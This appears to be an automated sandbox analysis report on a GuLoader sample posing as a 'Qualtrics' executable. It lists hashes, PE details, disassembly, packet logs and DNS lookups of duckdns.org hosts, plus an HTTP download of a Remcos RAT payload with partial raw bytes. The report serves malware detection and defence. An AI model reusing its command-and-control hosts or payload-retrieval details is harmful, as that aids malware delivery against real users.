          MD5:5f09b37b56cb003804dca1a778799746
          SHA1:7d9924657fb4275d47b1e8ff30abfd6a1726ca70
          SHA256:1f2f9b357003d7816259c172bff00bc8be6305247a94594de4eb9a7e7ecbb385
          SHA512:61c89f0eddf54e3ab7883cf18557711d4a143a6cb8f72c6c6bb92888f48e0ea1186d4347dee922dc79ea60f63bde2a4e830e3c03a1836efa6c45f3885eb30ef9
          SSDEEP:3072:GI8X4DXaGnFbn3j+2co5q0DtH1+Z8j7G9YgVoDqD9N9:Gj4DqGFbT+Zo5RD5Fjq9RoY
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.......................D.......=.......Rich............PE..L...X..N.....................0....................@................

          File Icon

          Icon Hash:20047c7c70f0e004

          Static PE Info

          General

          Entrypoint:0x4013f0
          Entrypoint Section:.text
          Digitally signed:false
          Imagebase:0x400000
          Subsystem:windows gui
          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          DLL Characteristics:
          Time Stamp:0x4EC4AC58 [Thu Nov 17 06:40:24 2011 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:4
          OS Version Minor:0
          File Version Major:4
          File Version Minor:0
          Subsystem Version Major:4
          Subsystem Version Minor:0
          Import Hash:bd85017eeb8dd3332d04b1838f2b93b1

          Entrypoint Preview

          Instruction
          push 00401698h
          call 00007FE2848F6353h
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          xor byte ptr [eax], al
          add byte ptr [eax], al
          inc eax
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add bh, dl
          inc ebp
          dec edi
          hlt
          insd
          out dx, eax
          inc esi
          mov ecx, 629EC330h
          mov dword ptr [00009238h], eax
          add byte ptr [eax], al
          add byte ptr [eax], al
          add dword ptr [eax], eax
          add byte ptr [eax], al
          inc edx
          add byte ptr [edx], al
          push eax
          add dword ptr [ecx], 42h
          outsd
          insd
          bound edi, dword ptr [ecx+6Ch]
          imul ebp, dword ptr [ecx+64h], CC006561h
          aas
          or eax, dword ptr [ebx]
          add byte ptr [eax], al
          add byte ptr [eax], al
          dec esp
          xor dword ptr [eax], eax
          or al, 73h
          mov edx, 30173730h
          je 00007FE2848F63A6h
          movsb
          sub ebp, dword ptr [ecx-59423EB9h]
          mov al, byte ptr [8B7091A7h]
          mov esp, 844382B6h
          test byte ptr [eax], ah
          call far 4F3Ah : 07D5689Ah
          lodsd
          xor ebx, dword ptr [ecx-48EE309Ah]
          or al, 00h
          stosb
          add byte ptr [eax-2Dh], ah
          xchg eax, ebx
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          test dword ptr [ecx], 00470000h
          add byte ptr [eax], al
          add byte ptr [ebx], cl
          add byte ptr [eax+6Ch], dl
          popad
          jnc 00007FE2848F63D0h
          jnc 00007FE2848F63D5h
          imul esp, dword ptr [edi+74h], 07010D00h
          add byte ptr [edx+esi*2+69h], dl

          Data Directories

          NameVirtual AddressVirtual Size Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IMPORT0x2d0740x28.text
          IMAGE_DIRECTORY_ENTRY_RESOURCE0x300000xbea.rsrc
          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2280x20
          IMAGE_DIRECTORY_ENTRY_IAT0x10000x138.text
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

          Sections

          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
          .text0x10000x2c5280x2d000False0.619411892361data7.41395278491IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          .data0x2e0000x190c0x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
          .rsrc0x300000xbea0x1000False0.2529296875data3.21005066435IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

          Resources

          NameRVASizeTypeLanguageCountry
          CUSTOM0x309900x25aASCII text, with CRLF line terminatorsEnglishUnited States
          RT_ICON0x308600x130data
          RT_ICON0x305780x2e8data
          RT_ICON0x304500x128GLS_BINARY_LSB_FIRST
          RT_GROUP_ICON0x304200x30data
          RT_VERSION0x301a00x280dataEnglishUnited States

          Imports

          DLLImport
          MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, __vbaEnd, _adj_fdiv_m64, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, _adj_fdiv_m16i, _adj_fdivr_m16i, __vbaVarTstLt, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, _adj_fpatan, __vbaRedim, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, _CIlog, __vbaErrorOverflow, __vbaNew2, __vbaInStr, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaLateMemCall, __vbaVarAdd, __vbaVarDup, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

          Version Infos

          DescriptionData
          Translation0x0409 0x04b0
          InternalNameTREMMERNE
          FileVersion1.04
          CompanyNameQualtrics
          CommentsQualtrics
          ProductNameQualtrics
          ProductVersion1.04
          FileDescriptionQualtrics
          OriginalFilenameTREMMERNE.exe

          Possible Origin

          Language of compilation systemCountry where language is spokenMap
          EnglishUnited States

          Network Behavior

          Snort IDS Alerts

          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
          09/27/21-12:01:09.327782UDP254DNS SPOOF query response with TTL of 1 min. and no authority53500558.8.8.8192.168.2.6
          09/27/21-12:01:11.469581UDP254DNS SPOOF query response with TTL of 1 min. and no authority53613748.8.8.8192.168.2.6

          Network Port Distribution

          TCP Packets

          TimestampSource PortDest PortSource IPDest IP
          Sep 27, 2021 12:01:09.399159908 CEST4982680192.168.2.623.146.242.85
          Sep 27, 2021 12:01:09.511538029 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:09.515326023 CEST4982680192.168.2.623.146.242.85
          Sep 27, 2021 12:01:09.571798086 CEST4982680192.168.2.623.146.242.85
          Sep 27, 2021 12:01:09.685571909 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:09.685606956 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:09.685631037 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:09.685642958 CEST4982680192.168.2.623.146.242.85
          Sep 27, 2021 12:01:09.685655117 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:09.685671091 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:09.685691118 CEST4982680192.168.2.623.146.242.85
          Sep 27, 2021 12:01:09.685749054 CEST4982680192.168.2.623.146.242.85
          Sep 27, 2021 12:01:09.798145056 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:09.798172951 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:09.798479080 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:09.798500061 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:09.798517942 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:09.798533916 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:09.798549891 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:09.798567057 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:09.798583031 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:09.798937082 CEST4982680192.168.2.623.146.242.85
          Sep 27, 2021 12:01:09.799078941 CEST4982680192.168.2.623.146.242.85
          Sep 27, 2021 12:01:09.911395073 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:09.911441088 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:09.911468983 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:09.911514044 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:09.911537886 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:09.911569118 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:09.911596060 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:09.911619902 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:09.911648035 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:09.911673069 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:09.911700010 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:09.911727905 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:09.911770105 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:09.911791086 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:09.911813974 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:09.912409067 CEST4982680192.168.2.623.146.242.85
          Sep 27, 2021 12:01:10.024640083 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:10.024682999 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:10.024703026 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:10.024753094 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:10.024775982 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:10.024802923 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:10.024828911 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:10.024852991 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:10.024876118 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:10.024899960 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:10.024921894 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:10.025033951 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:10.025058031 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:10.025082111 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:10.025105000 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:10.025131941 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:10.025156021 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:10.025177956 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:10.025193930 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:10.027384043 CEST4982680192.168.2.623.146.242.85
          Sep 27, 2021 12:01:10.139297962 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:10.139336109 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:10.139357090 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:10.139377117 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:10.139399052 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:10.139419079 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:10.139448881 CEST4982680192.168.2.623.146.242.85
          Sep 27, 2021 12:01:10.139468908 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:10.139545918 CEST4982680192.168.2.623.146.242.85
          Sep 27, 2021 12:01:10.139556885 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:10.139583111 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:10.139607906 CEST4982680192.168.2.623.146.242.85
          Sep 27, 2021 12:01:10.139652014 CEST4982680192.168.2.623.146.242.85
          Sep 27, 2021 12:01:10.140234947 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:10.140263081 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:10.140286922 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:10.140307903 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:10.140316963 CEST4982680192.168.2.623.146.242.85
          Sep 27, 2021 12:01:10.140330076 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:10.140350103 CEST4982680192.168.2.623.146.242.85
          Sep 27, 2021 12:01:10.140352964 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:10.140377998 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:10.140402079 CEST4982680192.168.2.623.146.242.85
          Sep 27, 2021 12:01:10.140407085 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:10.140427113 CEST4982680192.168.2.623.146.242.85
          Sep 27, 2021 12:01:10.140429974 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:10.140450954 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:10.140469074 CEST4982680192.168.2.623.146.242.85
          Sep 27, 2021 12:01:10.140474081 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:10.140497923 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:10.140517950 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:10.140537024 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:10.140538931 CEST4982680192.168.2.623.146.242.85
          Sep 27, 2021 12:01:10.140558958 CEST4982680192.168.2.623.146.242.85
          Sep 27, 2021 12:01:10.253523111 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:10.253557920 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:10.253582954 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:10.253607035 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:10.253619909 CEST4982680192.168.2.623.146.242.85
          Sep 27, 2021 12:01:10.253632069 CEST804982623.146.242.85192.168.2.6
          Sep 27, 2021 12:01:10.253655910 CEST804982623.146.242.85192.168.2.6

          UDP Packets

          TimestampSource PortDest PortSource IPDest IP
          Sep 27, 2021 11:58:04.005224943 CEST5451353192.168.2.68.8.8.8
          Sep 27, 2021 11:58:04.032073021 CEST53545138.8.8.8192.168.2.6
          Sep 27, 2021 11:58:18.950525999 CEST6204453192.168.2.68.8.8.8
          Sep 27, 2021 11:58:19.027103901 CEST53620448.8.8.8192.168.2.6
          Sep 27, 2021 11:58:19.744672060 CEST6379153192.168.2.68.8.8.8
          Sep 27, 2021 11:58:19.842484951 CEST53637918.8.8.8192.168.2.6
          Sep 27, 2021 11:58:20.240284920 CEST6426753192.168.2.68.8.8.8
          Sep 27, 2021 11:58:20.307231903 CEST53642678.8.8.8192.168.2.6
          Sep 27, 2021 11:58:20.604614019 CEST4944853192.168.2.68.8.8.8
          Sep 27, 2021 11:58:20.618647099 CEST53494488.8.8.8192.168.2.6
          Sep 27, 2021 11:58:21.073795080 CEST6034253192.168.2.68.8.8.8
          Sep 27, 2021 11:58:21.087407112 CEST53603428.8.8.8192.168.2.6
          Sep 27, 2021 11:58:21.445225000 CEST6134653192.168.2.68.8.8.8
          Sep 27, 2021 11:58:21.472714901 CEST53613468.8.8.8192.168.2.6
          Sep 27, 2021 11:58:21.519813061 CEST5177453192.168.2.68.8.8.8
          Sep 27, 2021 11:58:21.535204887 CEST53517748.8.8.8192.168.2.6
          Sep 27, 2021 11:58:21.939475060 CEST5602353192.168.2.68.8.8.8
          Sep 27, 2021 11:58:21.953433037 CEST53560238.8.8.8192.168.2.6
          Sep 27, 2021 11:58:22.586143017 CEST5838453192.168.2.68.8.8.8
          Sep 27, 2021 11:58:22.716329098 CEST53583848.8.8.8192.168.2.6
          Sep 27, 2021 11:58:23.737333059 CEST6026153192.168.2.68.8.8.8
          Sep 27, 2021 11:58:23.751560926 CEST53602618.8.8.8192.168.2.6
          Sep 27, 2021 11:58:24.083543062 CEST5606153192.168.2.68.8.8.8
          Sep 27, 2021 11:58:24.097618103 CEST53560618.8.8.8192.168.2.6
          Sep 27, 2021 11:58:45.185661077 CEST5833653192.168.2.68.8.8.8
          Sep 27, 2021 11:58:45.214778900 CEST53583368.8.8.8192.168.2.6
          Sep 27, 2021 11:58:45.351905107 CEST5378153192.168.2.68.8.8.8
          Sep 27, 2021 11:58:45.387033939 CEST53537818.8.8.8192.168.2.6
          Sep 27, 2021 11:58:50.912964106 CEST5406453192.168.2.68.8.8.8
          Sep 27, 2021 11:58:50.955738068 CEST53540648.8.8.8192.168.2.6
          Sep 27, 2021 11:59:01.400873899 CEST5281153192.168.2.68.8.8.8
          Sep 27, 2021 11:59:01.455881119 CEST53528118.8.8.8192.168.2.6
          Sep 27, 2021 11:59:27.841049910 CEST5529953192.168.2.68.8.8.8
          Sep 27, 2021 11:59:27.853720903 CEST53552998.8.8.8192.168.2.6
          Sep 27, 2021 11:59:34.487144947 CEST6374553192.168.2.68.8.8.8
          Sep 27, 2021 11:59:34.521306992 CEST53637458.8.8.8192.168.2.6
          Sep 27, 2021 12:01:09.211680889 CEST5005553192.168.2.68.8.8.8
          Sep 27, 2021 12:01:09.327781916 CEST53500558.8.8.8192.168.2.6
          Sep 27, 2021 12:01:11.354238033 CEST6137453192.168.2.68.8.8.8
          Sep 27, 2021 12:01:11.469580889 CEST53613748.8.8.8192.168.2.6

          DNS Queries

          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
          Sep 27, 2021 12:01:09.211680889 CEST192.168.2.68.8.8.80xd6aeStandard query (0)dypage.duckdns.orgA (IP address)IN (0x0001)
          Sep 27, 2021 12:01:11.354238033 CEST192.168.2.68.8.8.80x2aa8Standard query (0)dyn-wave.duckdns.orgA (IP address)IN (0x0001)

          DNS Answers

          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
          Sep 27, 2021 12:01:09.327781916 CEST8.8.8.8192.168.2.60xd6aeNo error (0)dypage.duckdns.org23.146.242.85A (IP address)IN (0x0001)
          Sep 27, 2021 12:01:11.469580889 CEST8.8.8.8192.168.2.60x2aa8No error (0)dyn-wave.duckdns.org23.146.241.70A (IP address)IN (0x0001)

          HTTP Request Dependency Graph

          • dypage.duckdns.org

          HTTP Packets

          Session IDSource IPSource PortDestination IPDestination PortProcess
          0192.168.2.64982623.146.242.8580C:\Users\user\Desktop\7HHrcwZjLI.exe
          TimestampkBytes transferredDirectionData
          Sep 27, 2021 12:01:09.571798086 CEST5754OUTGET /remcos_d_QUBXVO174.bin HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
          Host: dypage.duckdns.org
          Cache-Control: no-cache
          Sep 27, 2021 12:01:09.685571909 CEST5756INHTTP/1.1 200 OK
          Content-Type: application/octet-stream
          Last-Modified: Sun, 26 Sep 2021 08:30:43 GMT
          Accept-Ranges: bytes
          ETag: "119daccbb0b2d71:0"
          Server: Microsoft-IIS/8.5
          Date: Mon, 27 Sep 2021 10:01:01 GMT
          Content-Length: 469056
          Data Raw: 85 72 65 da fa 84 5d ef 15 48 c7 41 95 63 98 4c 63 5c 6a c2 3d 2e 3a e3 ec 0a 1a e6 db fd dd c6 fc 00 3b 08 52 f8 0f c5 51 c6 12 00 b4 f2 2d 4e 7c 5c d4 19 c5 66 d6 f6 9f 3d 55 40 d3 5a 1a 51 5a d4 5a b4 d7 4e 5d 9c c8 d6 64 64 7a 23 4e b3 10 1b 3f a3 f8 15 94 93 f4 27 de 3a 43 d1 26 a4 f0 36 5e ef 78 e6 dd 4b 1f 40 e0 5b 05 12 8e e3 b3 6a a2 48 8d fe 13 86 0f 01 3b e4 e7 fd 24 3b ff 58 78 e6 91 3f 5c 9d 54 a0 ce 0d 92 64 eb 2a a5 20 4e 5b af bc 28 bf fd 7a be ad ff 17 f6 14 28 9a 4e e8 85 5c 75 ba f0 cb c4 71 50 13 15 48 bb a5 eb 21 ea 51 9b 09 ed 8f 8a 15 22 80 64 de 02 97 bf eb 22 b7 53 85 85 5a ef 47 43 0f 28 50 b0 b6 89 91 4a ee da 68 54 01 3a 07 44 0b 84 c7 5d 03 b4 2c d3 60 48 3a 57 8a 60 f0 13 1b 25 b2 dd 4f 24 c9 5c d8 f8 1a 16 55 10 a7 0e b2 54 2f a0 98 39 61 7b f9 b4 7c f8 42 d5 70 8f e6 76 71 ef 68 15 89 cd 1e 6d c2 b9 63 39 60 81 3b 84 83 e6 65 a4 60 1c f9 40 62 30 ec 9b 64 2f 73 33 54 d5 d7 b0 18 f1 a5 0d ac f0 83 ad 9f 76 4d 5d b4 c2 61 85 30 38 73 17 4b a0 a1 b5 65 79 f0 61 e1 60 a1 1e d1 24 bd b4 05 19 90 e9 05 d7 44 28 e4 97 cd ac fc aa 02 9f 88 c3 a4 c3 72 50 c0 fb d6 27 91 93 b6 64 e7 f7 e7 5d b9 e7 98 74 69 ba 95 5e 8b b2 e6 26 eb 31 e7 d8 dd 04 f3 55 41 c1 a2 41 92 b2 9e 38 57 6f 03 59 51 3c 1c 24 99 eb 85 2d 95 35 b2 95 38 b4 f4 5d 94 d2 1d de 01 ad cd 3b cd f0 c3 c1 7c cd ac e1 25 d4 79 b4 d3 9f 42 16 8c 4f 82 14 1d cd cf 60 8b f5 35 b4 40 ad 45 eb 32 6c 64 9a 18 41 3a 7c ce a2 35 9e 80 48 d5 d8 4b 8f 6d 11 8b 11 1f dc 9c 34 8c 45 89 b9 da 0b 2d d3 5f 03 2f 66 57 90 b3 e5 a2 3e 8f db af 0c 26 ed 66 f2 8b 4d 0d be 3c 01 c0 bf 4a cf 3b d0 a2 24 27 c7 e2 f3 f7 6c cc c5 4f 95 fc 69 f4 6a 33 21 ae 79 46 9f 63 df c5 d9 35 fd 2d 91 95 fa be eb 65 d4 8e 88 e0 49 61 c8 e5 c1 64 11 56 d2 78 da 5a a0 ef fe fb d1 e7 99 25 8e 71 ac 71 67 5f ac 3b a4 01 98 3b af 3a 18 4a e4 d1 09 01 df 3d 19 a6 2e 59 36 06 18 54 61 eb f4 7c 87 8f bf 74 1d 6e 45 de e3 8f c9 1d e8 64 86 8c c7 3f dc 31 83 17 1d a6 3a d1 d7 f7 1e 7f c5 f6 0f 47 9e fe e7 1c f6 9e fd 3e 12 b3 cb 57 60 c0 45 25 5f fb 5a 3d 19 ce a8 92 df 6b a1 6e 22 77 86 43 ec 70 7c 59 19 0d 5a 2d 62 c1 86 84 07 26 e3 fe 87 ff 40 fe f5 66 3b ec 6d 00 4c cc 91 69 ae d5 bd 75 a6 d5 8a 18 6f 66 20 93 e6 a1 6b 9b ac f5 34 83 6e b9 05 67 e8 ba 9a c9 75 cf e9 ba 3a 64 69 73 d2 14 2f cf 59 ce 2c 87 0b f5 22 c6 d3 3e 21 99 83 04 bd af fb 74 72 3d f1 bf d5 f5 73 1a f6 51 a8 e5 ed fb f7 3c 18 70 a3 a7 52 e4 41 cf bd f1 69 d6 d1 b9 4e 81 72 b4 2e 38 50 9e 73 f7 49 ee 52 35 1b 3e c4 0c da 83 50 12 b1 a0 8a 06 40 d2 4b 4b 80 be 32 9f ff c1 fa ed ec ac 2c d8 a9 18 d2 69 c8 86 30 ee 1a e1 61 08 2a 4a 37 dd 5a 48 41 d5 ac fa 8a e8 f1 49 f8 81 30 c4 c9 00 30 70 0b 57 5b 99 cb 09 e5 4f a2 fa c8 52 f2 5a 4e 80 dd 89 ad 4d 26 2f f7 72 18 24 b7 38 b5 02 e7 17 2e f3 f9 56 40 ce 8f 79 5b af c8 0c 15 17 8e ca b4 d4 4e 5d 9c cc d6 64 64 85 dc 4e b3 a8 1b 3f a3 f8 15 94 93 b4 27 de 3a 43 d1 26 a4 f0 36 5e ef 78 e6 dd 4b 1f 40 e0 5b 05 12 8e e3 b3 6a a2 48 8d fe 13 86 0f 01 3b e4 f7 fc 24 3b f1 47 c2 e8 91 8b 55 50 75 18 cf 41 5f 45 bf 42 cc 53 6e 2b dd d3 4f cd 9c 17 9e ce 9e 79 98 7b 5c ba 2c 8d a5 2e 00 d4 d0 a2 aa 51 14 5c 46 68 d6 ca 8f 44 c4 5c 96 03 c9 8f 8a 15 22 80 64 de a8 14 fd db cc 55 7f e6 6b b8 c3 24 ad ed 04 33 ea c8 54 f2 b6 0c f6 0b 0e 7f e5 64 0b e9 a8 a4 07 c4 8a 8f 65 82 8c 3a bf
          Data Ascii: re]HAcLc\j=.:;RQ-N|\f=U@ZQZZN]ddz#N?':C&6^xK@[jH;$;Xx?\Td* N[(z(N\uqPH!Q"d"SZGC(PJhT:D],`H:W`%O$\UT/9a{|Bpvqhmc9`;e`@b0d/s3TvM]a08sKeya`$D(rP'd]ti^&1UAA8WoYQ<$-58];|%yBO`5@E2ldA:|5HKm4E-_/fW>&fM<J;$'lOij3!yFc5-eIadVxZ%qqg_;;:J=.Y6Ta|tnEd?1:G>W`E%_Z=kn"wCp|YZ-b&@f;mLiuof k4ngu:dis/Y,">!tr=sQ<pRAiNr.8PsIR5>P@KK2,i0a*J7ZHAI00pW[ORZNM&/r$8.V@y[N]ddN?':C&6^xK@[jH;$;GUPuA_EBSn+Oy{\,.Q\FhD\"dUk$3Tde:


          Code Manipulations

          Statistics

          Behavior

          Click to jump to process

          System Behavior

          General

          Start time:11:57:38
          Start date:27/09/2021
          Path:C:\Users\user\Desktop\7HHrcwZjLI.exe
          Wow64 process (32bit):true
          Commandline:'C:\Users\user\Desktop\7HHrcwZjLI.exe'
          Imagebase:0x400000
          File size:196608 bytes
          MD5 hash:5F09B37B56CB003804DCA1A778799746
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:Visual Basic
          Yara matches:
          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.569030215.0000000002CD0000.00000040.00000001.sdmp, Author: Joe Security
          Reputation:low

          General

          Start time:11:59:22
          Start date:27/09/2021
          Path:C:\Users\user\Desktop\7HHrcwZjLI.exe
          Wow64 process (32bit):true
          Commandline:'C:\Users\user\Desktop\7HHrcwZjLI.exe'
          Imagebase:0x400000
          File size:196608 bytes
          MD5 hash:5F09B37B56CB003804DCA1A778799746
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000013.00000002.869170451.0000000000860000.00000004.00000020.sdmp, Author: Joe Security
          Reputation:low

          Disassembly

          Code Analysis

          Reset < >